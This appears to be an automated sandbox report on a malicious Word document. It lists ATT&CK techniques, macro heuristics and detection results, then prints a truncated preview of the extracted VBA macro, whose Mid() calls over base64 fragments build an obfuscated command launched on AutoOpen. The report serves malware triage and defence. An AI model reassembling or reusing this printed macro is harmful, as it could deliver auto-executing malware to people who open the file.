Verdict: MALICIOUS
Risk Score: 184

Malware Insights
MITRE ATT&CK
- T1059.005 Visual Basic
- T1204.002 Malicious File
- T1059 Command and Scripting Interpreter
The sample contains a VBA macro whose AutoOpen routine calls Shell() to execute a command. That command appears to construct a registry path for persistence and likely downloads a second-stage payload. The obfuscation of the script and the use of Shell() indicate malicious intent to execute arbitrary code.
Heuristics (7)

- VBA macros detected (medium, 3 related findings) [OLE_VBA_MACROS]: Document contains VBA macro code.
- Shell() call in VBA (critical) [OLE_VBA_SHELL]: Shell() call in VBA.
- AutoOpen macro (high) [OLE_VBA_AUTOOPEN]: AutoOpen macro.
- VBA p-code auto-exec with execution tokens (high) [OLE_VBA_PCODE_AUTOEXEC_EXEC]: Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Legacy WordBasic auto-exec macro marker (medium) [OLE_LEGACY_WORDBASIC_AUTOEXEC]: OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Suspicious extracted artifact (info) [EXTRACTED_FILE_STATIC_TRIAGE]: One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
- Embedded URL (info) [EMBEDDED_URL]: One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 13124 bytes |

SHA-256: 416f7d651c5f1b2981166b95b9710b22a8d1229923f2fe5ae6f3b87906ef369a

Detection:
- ClamAV: No threats found
- Obfuscation or payload: likely (carved artifact contains 31 long base64-like blob(s))

Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "osjTPnoCq"
Function roRdIbifB()
DzUHXosjZrf = Mid("0R8zi891u6nI9o6vJCfgA1ADcAYQAxADYANwBxADEANgA3AG4AMQA2ADcAcAA1ADYAOgAxADUAMgBuADEANAAxAFoAMQA2ADcAXwAxADQAMQBaADEANQA0AF8AMQA2ADUAbgAxADUANQA6ADEMESazArM4lzvj", 19, 127)
zMaRT = Mid("mO1TUNCNMcOiBPNQ7zpzDHoJn6BA6ADEANgA0ADoAMQA2ADQAOgAxADYAMABaADcAMgB5ADUANwBUADUANwBaADEANAAxAHoDldi4ChUUi", 28, 68)
mZXTDHYrB = Mid("shXjANQBhADEANAAyAH4AMQAwADMAcQAxADUANABaADEANQAxAHAAMQA0ADUAcQAxADUANgBUADEANgA0AHEANwAzAHkANAA0AFQAMQA2ADIAXwAxADQAMQB5ADEANQA2AHkAMQA0ADQAcAAxADUANwBfADEANQA1AFoANAAwAHAANwA1AHAANAAwAG4AMQA1ADYAfgAxA7Y4r31wjdjiYiskrmTHvdJ0J7ZnSL4XuHi", 5, 198)
OjtRCGbjw = Mid("Rk9GUck3vjVf1NwAxAHAAMQA3ADIAVAA1ADcAcAA1ADQAVAAxADUAMABwADEANgA0AF8AMQA2ADQAXwAxADYAMAB5ADcAMgB+ADUANwBfADUANwA6ADEANgA3AFQAMQA2ADcAeQAxADYANwD5jNz", 14, 130)
AClItauXY = Mid("PBFfd36kAZHvwkzKBmrxADQAMwA6ADEANgA0AFQANAAwAHPIb", 20, 27)
QCkdlcwJiNw = Mid("JtChR6dQANQA0AFoANQA2ADoAMQA0ADMAXwAxADUANwBfADEANQA1AHAANQA3AH4AMQA0A31UqJfPAta", 9, 62)
zvFAOkLwJDw = Mid("3izEpUcOGVJTsHzJfuZhi1zNgA3ADoAMQA0ADUAbgAxADQAMgB+ADEANAAzAF8AMQA1ADQAfgAxADUAMQBhADEANAA1AG4AMQA1ADYAcQAxADYANABwADUANgB5ADEAMAA0ADoAMQA1ADcAbgAxADYANwBwADEANQA2AG4AMQA1ADQAcA9dCs5PMXj", 24, 154)
ioZAZJVzaac = Mid("nPTifqJwB+ACcALQBTAHAATABpAFQAIAAnAF8AJwAtAFMAcABMAEkAdAAnAHEAJwAtAFMAcABMAEkAdAAgACcAbgAnACAALQBTAHAAbABPzS4C3RvuU6j3nMo6cnzr", 7, 99)
ANsKpifBO = Mid("iMa1jXGGMQA1ADEAfgAxADUANgA6ADQAMABfADQANABfADEANgA1AHkAMQA2ADIAYQAxADUANABaADEANgAzAG4ANQAxAFQAMQA3ADMAeQAxADYANABaADEANgAyAFoAMQA3ADEAWgAxADcAMwB14", 9, 139)
uToOZMzQWtR = Mid("WwVfh3541DWgAxADUANQA6ADEANAA1AG4ANAAwAHkANwA1AHEANAAwAHkANAA0AG4AMQA2ADIAXwAxADQAMQB+ADEANQA2AF8AMQA0ADQAWgAxAvKwGI", 11, 101)
RXIGv = Mid("MV8bH31ADEAcAAxADQAMwA6ADUANgB+ADEANAA1ADoAMQA0ADMAeQAxADUANwBhADUANgB+ADEANAAyAF8AMQA2ADIAcAA1ADcAVAAxADYANwBaADEANgA0AFQANQA3AH4ANQA0AF8AMQA1ADAAeQAxADYANABxADEANgA0AGEAMQA2ADA3thkFHsJiu", 7, 172)
NwwPiY = Mid("aoJ89CBaADUANgBhADEANgAyAFoAMQA0ADUAYQAxADYAMABaADEANQA0AF8AMQA0ADEAcQAxADYAMwBaADEANgA0AHEAMQAwi6oRWtahYKr6mnr0HsRTG0aS8", 7, 89)
CWMDw = Mid("aWoaG2GUOAGEAMQA0ADEAeQAxADYANAA6ADEANQwaFM4it11QJzOz1ApvRNi", 10, 30)
IkUFUGnI = Mid("DCzPXTMQBuADEANQA2AnI5Wwnw1mFf8udn4IMjVsWIiRAaj", 7, 13)
MSLdtGSYWnh = Mid("z9AF8ANAA0ADoAMQA2ADcAcQAxADQANQB+ADEANAAyAHEAMQA0ADMAOgAxADUANABaADEANQAxADoAMQA0ADUAeQ6fR1Mn0vSb1", 3, 86)
KFLHtvdT = Mid("9vZAjl0iTjPWDMAOgAxADQAMQBhADEANgA0AHAAMQA0ADMAcAAxADUAMAA6ADEANwAzAH4AMQA2ADcAYQAxADYAMgB5ADEANQAxAHkAMQA2ADQAYQAxADQANQBwADUANQB5ADEANQAwAG4AMQA1ADcAcQAxADYAMwB5ADEBmhbqY", 13, 154)
dlVibOqdzc = Mid("P2rHtD48zYSH4AMQA0ADcAWgA1ADAAXwA1ADEAOgA1ADQAeQA0ADAAeQA0ADQAcAAxADYAMAA6ADEANAAxAFQAMQA2ADQAfgAxADUAMAA6ADUAMQBUADcAMwBwADEAMgAzAHEAMQA2ADQAcAAxADQAMQB+ADEANgAyAHkAMQA2ADQAbgA1ADUAfgAxADIAMAB5ADEANgAyAUTS", 12, 192)
zoiYGT = Mid("5GQP01tuk8miPMQA2ADQAbgA1ADYAXwAxADIAMwBaADEANQAwAFQAMQA0ADUAeQAxADUANABhADEANQA0AHAANwAz5wPV", 14, 76)
bEZnvk = Mid("55KQzvFp3waq6UhY8rm4bhVBD3DEANgA0AFoAMQA2ADAAcAA3ADIAcAA1ADcAMvr6N2u7H", 27, 35)
tbLJizU = Mid("8AXBpxADQANQBaADQAMABhADUAMwBUADQAMABuADQANwBUADUAKpdiiYduiYR", 6, 45)
wHROuErJjM = Mid("0As5WkAMQAyADMAcQAxADcAMQA6ADEANgAzAH4AMQA2ADQAWgAxADQANQBxADEANQA1AF8ANQA2AGEAMQAxADYAOgAxADQANQBuADEANgA0AFoANQA2AFQAMQAyADcAcQAxADQJCAOwdOIiPU0tLXXnrRvz8dfaacFHu", 6, 129)
ktwZZJSUWUl = Mid("2OMPWdDonlCLLfMSw3VRoYGEAMQA1ADcAeQAxADQAMwA6ADEANAA1AFQAMQA2ADMAYQAxADYAMwBuADQAMAB+ADQANABUADEANgAwpZ8kN", 23, 79)
HZNowLkwa = Mid("OGkwBMtYAizLANAAyAHkAMQA2ADUAbgAxADUANgB+ADEANAA3AF8AMQA1QY", 13, 45)
jNZJiiVTDMh = Mid("058SEANAA3AG4AMQA1ADcAWgAxADYAMwBfADEANgAzAFQANQA2AF8AMQA0ADIAOgAxADUANABfADEANQA3AFQAMQA0ADcAVAA1ADcAXwAxADAANgBaADEANgA1AFQAMQAwADcAcQAxADYANwB+ADEtDIwojBLnRhsMpbWqzDBBH", 5, 145)
mNcoRpn = Mid("bVKUATMDDrWzI1ADcAcAAxADYANwB+ADEANgA3AH4AMQA2ADcAXwA1ADYAYQAxADUAMAA6ADEANQA3AH
... (truncated)